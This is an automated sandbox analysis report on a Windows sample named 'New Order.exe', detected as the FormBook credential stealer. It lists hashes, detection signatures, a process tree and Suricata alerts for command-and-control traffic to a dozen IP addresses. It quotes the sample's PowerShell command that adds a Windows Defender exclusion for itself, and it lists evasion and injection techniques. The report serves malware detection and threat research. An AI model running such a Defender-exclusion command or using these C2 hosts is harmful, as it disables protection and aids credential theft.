Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order.exe

Overview

General Information

Sample name:New Order.exe
Analysis ID:1567406
MD5:8ef36959a2cedc10c4c6036c2360e105
SHA1:96c17b47e3bbcd645fdf24b3a7b3319848fb62ed
SHA256:c8e6b3d94513f697d73e00d43476dddd0abdaf8d5cc6954a1218571dbccec61e
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New Order.exe (PID: 3224 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 8EF36959A2CEDC10C4C6036C2360E105)
    • powershell.exe (PID: 5424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New Order.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 8EF36959A2CEDC10C4C6036C2360E105)
    • New Order.exe (PID: 7180 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 8EF36959A2CEDC10C4C6036C2360E105)
      • XVZmwHdSYwx.exe (PID: 3084 cmdline: "C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • w32tm.exe (PID: 8052 cmdline: "C:\Windows\SysWOW64\w32tm.exe" MD5: E55B6A057FDDD35A7380FB2C6811A8EC)
          • XVZmwHdSYwx.exe (PID: 5868 cmdline: "C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1708 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            8.2.New Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.New Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Order.exe", ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 3224, ParentProcessName: New Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", ProcessId: 5424, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Order.exe", ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 3224, ParentProcessName: New Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", ProcessId: 5424, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Order.exe", ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 3224, ParentProcessName: New Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe", ProcessId: 5424, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:38:32.568418+010020507451Malware Command and Control Activity Detected192.168.2.64983013.248.169.4880TCP
                2024-12-03T14:38:58.419961+010020507451Malware Command and Control Activity Detected192.168.2.649889154.90.35.24080TCP
                2024-12-03T14:39:13.325867+010020507451Malware Command and Control Activity Detected192.168.2.649928162.0.213.9480TCP
                2024-12-03T14:39:28.655512+010020507451Malware Command and Control Activity Detected192.168.2.64996568.66.226.9280TCP
                2024-12-03T14:39:43.826177+010020507451Malware Command and Control Activity Detected192.168.2.65000031.31.196.1780TCP
                2024-12-03T14:39:59.181051+010020507451Malware Command and Control Activity Detected192.168.2.650034130.185.109.7780TCP
                2024-12-03T14:40:17.522871+010020507451Malware Command and Control Activity Detected192.168.2.650038172.104.82.7480TCP
                2024-12-03T14:40:33.049521+010020507451Malware Command and Control Activity Detected192.168.2.650042208.91.197.2780TCP
                2024-12-03T14:40:48.765760+010020507451Malware Command and Control Activity Detected192.168.2.650046154.23.184.9580TCP
                2024-12-03T14:41:03.845046+010020507451Malware Command and Control Activity Detected192.168.2.650050172.104.18.23380TCP
                2024-12-03T14:41:19.134440+010020507451Malware Command and Control Activity Detected192.168.2.650055173.236.199.9780TCP
                2024-12-03T14:41:34.704363+010020507451Malware Command and Control Activity Detected192.168.2.65005985.159.66.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:38:32.568418+010028554651A Network Trojan was detected192.168.2.64983013.248.169.4880TCP
                2024-12-03T14:38:58.419961+010028554651A Network Trojan was detected192.168.2.649889154.90.35.24080TCP
                2024-12-03T14:39:13.325867+010028554651A Network Trojan was detected192.168.2.649928162.0.213.9480TCP
                2024-12-03T14:39:28.655512+010028554651A Network Trojan was detected192.168.2.64996568.66.226.9280TCP
                2024-12-03T14:39:43.826177+010028554651A Network Trojan was detected192.168.2.65000031.31.196.1780TCP
                2024-12-03T14:39:59.181051+010028554651A Network Trojan was detected192.168.2.650034130.185.109.7780TCP
                2024-12-03T14:40:17.522871+010028554651A Network Trojan was detected192.168.2.650038172.104.82.7480TCP
                2024-12-03T14:40:33.049521+010028554651A Network Trojan was detected192.168.2.650042208.91.197.2780TCP
                2024-12-03T14:40:48.765760+010028554651A Network Trojan was detected192.168.2.650046154.23.184.9580TCP
                2024-12-03T14:41:03.845046+010028554651A Network Trojan was detected192.168.2.650050172.104.18.23380TCP
                2024-12-03T14:41:19.134440+010028554651A Network Trojan was detected192.168.2.650055173.236.199.9780TCP
                2024-12-03T14:41:34.704363+010028554651A Network Trojan was detected192.168.2.65005985.159.66.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:38:50.059697+010028554641A Network Trojan was detected192.168.2.649870154.90.35.24080TCP
                2024-12-03T14:38:52.731586+010028554641A Network Trojan was detected192.168.2.649876154.90.35.24080TCP
                2024-12-03T14:38:55.403519+010028554641A Network Trojan was detected192.168.2.649883154.90.35.24080TCP
                2024-12-03T14:39:05.373364+010028554641A Network Trojan was detected192.168.2.649907162.0.213.9480TCP
                2024-12-03T14:39:07.975620+010028554641A Network Trojan was detected192.168.2.649916162.0.213.9480TCP
                2024-12-03T14:39:10.678060+010028554641A Network Trojan was detected192.168.2.649922162.0.213.9480TCP
                2024-12-03T14:39:20.607420+010028554641A Network Trojan was detected192.168.2.64994668.66.226.9280TCP
                2024-12-03T14:39:23.283014+010028554641A Network Trojan was detected192.168.2.64995368.66.226.9280TCP
                2024-12-03T14:39:25.939581+010028554641A Network Trojan was detected192.168.2.64996068.66.226.9280TCP
                2024-12-03T14:39:35.823243+010028554641A Network Trojan was detected192.168.2.64998131.31.196.1780TCP
                2024-12-03T14:39:38.497451+010028554641A Network Trojan was detected192.168.2.64998731.31.196.1780TCP
                2024-12-03T14:39:41.282174+010028554641A Network Trojan was detected192.168.2.64999331.31.196.1780TCP
                2024-12-03T14:39:51.245387+010028554641A Network Trojan was detected192.168.2.650020130.185.109.7780TCP
                2024-12-03T14:39:53.834742+010028554641A Network Trojan was detected192.168.2.650026130.185.109.7780TCP
                2024-12-03T14:39:56.580474+010028554641A Network Trojan was detected192.168.2.650033130.185.109.7780TCP
                2024-12-03T14:40:09.460333+010028554641A Network Trojan was detected192.168.2.650035172.104.82.7480TCP
                2024-12-03T14:40:12.133262+010028554641A Network Trojan was detected192.168.2.650036172.104.82.7480TCP
                2024-12-03T14:40:14.950707+010028554641A Network Trojan was detected192.168.2.650037172.104.82.7480TCP
                2024-12-03T14:40:24.558464+010028554641A Network Trojan was detected192.168.2.650039208.91.197.2780TCP
                2024-12-03T14:40:27.217634+010028554641A Network Trojan was detected192.168.2.650040208.91.197.2780TCP
                2024-12-03T14:40:29.803948+010028554641A Network Trojan was detected192.168.2.650041208.91.197.2780TCP
                2024-12-03T14:40:40.658339+010028554641A Network Trojan was detected192.168.2.650043154.23.184.9580TCP
                2024-12-03T14:40:43.325961+010028554641A Network Trojan was detected192.168.2.650044154.23.184.9580TCP
                2024-12-03T14:40:45.997652+010028554641A Network Trojan was detected192.168.2.650045154.23.184.9580TCP
                2024-12-03T14:40:55.729618+010028554641A Network Trojan was detected192.168.2.650047172.104.18.23380TCP
                2024-12-03T14:40:58.365545+010028554641A Network Trojan was detected192.168.2.650048172.104.18.23380TCP
                2024-12-03T14:41:01.169543+010028554641A Network Trojan was detected192.168.2.650049172.104.18.23380TCP
                2024-12-03T14:41:11.120114+010028554641A Network Trojan was detected192.168.2.650052173.236.199.9780TCP
                2024-12-03T14:41:13.842276+010028554641A Network Trojan was detected192.168.2.650053173.236.199.9780TCP
                2024-12-03T14:41:16.416218+010028554641A Network Trojan was detected192.168.2.650054173.236.199.9780TCP
                2024-12-03T14:41:26.888257+010028554641A Network Trojan was detected192.168.2.65005685.159.66.9380TCP
                2024-12-03T14:41:29.560132+010028554641A Network Trojan was detected192.168.2.65005785.159.66.9380TCP
                2024-12-03T14:41:32.232129+010028554641A Network Trojan was detected192.168.2.65005885.159.66.9380TCP
                2024-12-03T14:41:51.013348+010028554641A Network Trojan was detected192.168.2.650060154.70.82.24680TCP
                2024-12-03T14:41:55.487978+010028554641A Network Trojan was detected192.168.2.650061154.70.82.24680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: New Order.exeReversingLabs: Detection: 57%
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: New Order.exeJoe Sandbox ML: detected
                Source: New Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: w32tm.pdb source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000002.4633149087.0000000000928000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XVZmwHdSYwx.exe, 0000000D.00000002.4632680489.000000000075E000.00000002.00000001.01000000.0000000C.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4628553874.000000000075E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Order.exe, 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2484890220.0000000003007000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2491039290.00000000031BB000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Order.exe, New Order.exe, 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 0000000E.00000003.2484890220.0000000003007000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2491039290.00000000031BB000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: w32tm.pdbGCTL source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000002.4633149087.0000000000928000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0096CE00 FindFirstFileW,FindNextFileW,FindClose,14_2_0096CE00
                Source: C:\Users\user\Desktop\New Order.exeCode function: 4x nop then jmp 074A85DCh1_2_074A86AC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 4x nop then xor eax, eax14_2_0095A020
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 4x nop then mov ebx, 00000004h14_2_032804D8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49830 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49830 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49870 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49889 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49889 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49928 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49907 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49928 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49946 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49922 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49965 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49965 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50044 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49981 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50034 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50042 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50042 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50045 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50049 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50034 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49960 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50053 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49883 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49876 -> 154.90.35.240:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50052 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50060 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49916 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50061 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50048 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 130.185.109.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49953 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50043 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50055 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50055 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50047 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50050 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50054 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50038 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50038 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50046 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50050 -> 172.104.18.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50057 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50046 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50059 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50059 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50056 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50058 -> 85.159.66.93:80
                Source: DNS query: www.aiactor.xyz
                Source: DNS query: www.aiactor.xyz
                Source: Joe Sandbox ViewIP Address: 130.185.109.77 130.185.109.77
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: XIRRADE XIRRADE
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
